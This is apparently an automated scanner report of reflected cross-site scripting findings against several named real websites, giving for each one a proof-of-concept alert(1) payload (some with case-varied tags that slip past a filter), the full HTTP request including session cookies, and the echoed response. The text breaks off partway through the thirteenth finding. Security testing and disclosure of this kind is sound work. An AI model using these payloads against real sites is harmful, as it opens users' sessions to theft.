HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=96d24ac1-dc06-4ffd-bfff-d8434693a51e3I5070; expires=Sat, 13-Aug-2011 13:23:24 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=4922e
f6434b7c936
; expires=Sat, 13-Aug-2011 13: 23:24 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:24 GMT
Connection: close
Content-Length: 0


4. Cross-site scripting (reflected)
There are 62 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f4061<script>alert(1)</script>d96264b56bd was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061<script>alert(1)</script>d96264b56bd&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 5088

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;
   
   truste.ts = null; //initi
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att01cont1f4061<script>alert(1)</script>d96264b56bd_ib = '<div id="te-clr1-att01cont1f4061<script>
...[SNIP]...

4.2. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b&c=att01cont1&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:48 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
_att01cont1_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002",cam:"2",cid:"0311m300x250f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choi
...[SNIP]...

4.3. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:46 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3740

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choicesj.truste.com/ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f=1&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att01cont1_bi)});

4.4. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload eccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=treccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:31 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att01cont1_bi={baseName:"te-clr1-att01cont1",anchName:"te-clr1-att01cont1-anch",width:300,height:250,ox:0,oy:0,plc:"treccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce",iplc:"rel",intDivName:"te-clr1-att01cont1-itl",iconSpanId:"te-clr1-att01cont1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att01cont1",noticeBaseUrl:"/camsg?",irBaseUrl:"/c
...[SNIP]...

4.5. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 3d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=100023d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:25 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
uste.ca.hideoverlay(te_clr1_att01cont1_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att01",pid:"mec01",zindex:"100023d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54",cam:"2",cid:"0311m300x250"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("
...[SNIP]...

4.6. https://console.iservices.net.nz/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d729d"><script>alert(1)</script>1478c083729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d729d"><script>alert(1)</script>1478c083729=1 HTTP/1.1
Host: console.iservices.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:33:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.0
Set-Cookie: ISERVICES_SESSID=ITTEbbftfdQKVOjeNFZcc8YO4shpEO9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="d729d"><script>alert(1)</script>1478c083729" value="1" />
...[SNIP]...

4.7. https://idm.net.nz/secure/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /secure/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3076"><script>alert(1)</script>6b7dcefb176 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/?d3076"><script>alert(1)</script>6b7dcefb176=1 HTTP/1.1
Host: idm.net.nz
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:42:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8230

<html>
<head>
<title>IDM Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

...[SNIP]...
<input name="Referrer" type="hidden" value="https://idm.net.nz/secure/?d3076"><script>alert(1)</script>6b7dcefb176=1">
...[SNIP]...

4.8. https://idm.net.nz/secure/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /secure/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8a3"><script>alert(1)</script>54d864ce6a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/index.php?9f8a3"><script>alert(1)</script>54d864ce6a8=1 HTTP/1.1
Host: idm.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:51:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8239

<html>
<head>
<title>IDM Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

...[SNIP]...
<input name="Referrer" type="hidden" value="https://idm.net.nz/secure/index.php?9f8a3"><script>alert(1)</script>54d864ce6a8=1">
...[SNIP]...

4.9. https://secure.tagged.com/secure_login.html [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d343b"><script>alert(1)</script>cccd7a141af was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_USd343b"><script>alert(1)</script>cccd7a141af&uri=http%3A%2F%2Fwww.tagged.com&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_USd343b"><script>alert(1)</script>cccd7a141af&uri=http%3A%2F%2Fwww.tagged.com&display=full" method="POST" name="login">
...[SNIP]...

4.10. https://secure.tagged.com/secure_login.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b883"><script>alert(1)</script>868fc1f78e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883"><script>alert(1)</script>868fc1f78e0=1 HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:45:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2109

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883"><script>alert(1)</script>868fc1f78e0=1" method="POST" name="login">
...[SNIP]...

4.11. https://secure.tagged.com/secure_login.html [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae18e"><script>alert(1)</script>bd5fd72fb4f was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.comae18e"><script>alert(1)</script>bd5fd72fb4f&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.comae18e"><script>alert(1)</script>bd5fd72fb4f&display=full" method="POST" name="login">
...[SNIP]...

4.12. https://secure.tagged.com/secure_login.html [ver parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the ver request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd03"><script>alert(1)</script>c5012c1ae01 was submitted in the ver parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=22dd03"><script>alert(1)</script>c5012c1ae01&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=22dd03"><script>alert(1)</script>c5012c1ae01&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full" method="POST" name="login">
...[SNIP]...

4.13. http://tweetbeat.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tweetbeat.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79ae7'%20style%3dx%3aexpression(alert(1))%20e9cde0e431c was submitted in the REST URL parameter 1. This input was echoed as 79ae7' style=x:expression(alert(1)) e9cde0e431c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /79ae7'%20style%3dx%3aexpression(alert(1))%20e9cde0e431c HTTP/1.1
Host: tweetbeat.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=111610369.1305489666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111610369.1610363998.1305489666.1305489666.1305489666.1; __utmc=111610369; __utmb=111610369.1.10.1305489666; is_returning=1; version=2; _genome_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRiIlY2E2ZTNmNDFiNzJiODFhMzY1Yjg5NDcwNmE4YmI5YTJJIhRhYmluZ29faWRlbnRpdHkGOwBGbCsHmf6se0kiEF9jc3JmX3Rva2VuBjsARkkiMVNYY2pvSEVCQnNEVHhLTS9EN3ptcVdMN0hNUUp2RGVCUXBTTmRLbVVOZ1k9BjsARg%3D%3D--65608cc915d0028ef5c7ed0070394e6790f362d5; NSC_uc2.uxffucfbu.dpn=ffffffff0904168a45525d5f4f58455e445a4a422e50; _chartbeat2=t5cmaxi3cat2wqxj

Response

HTTP/1.1 200 OK
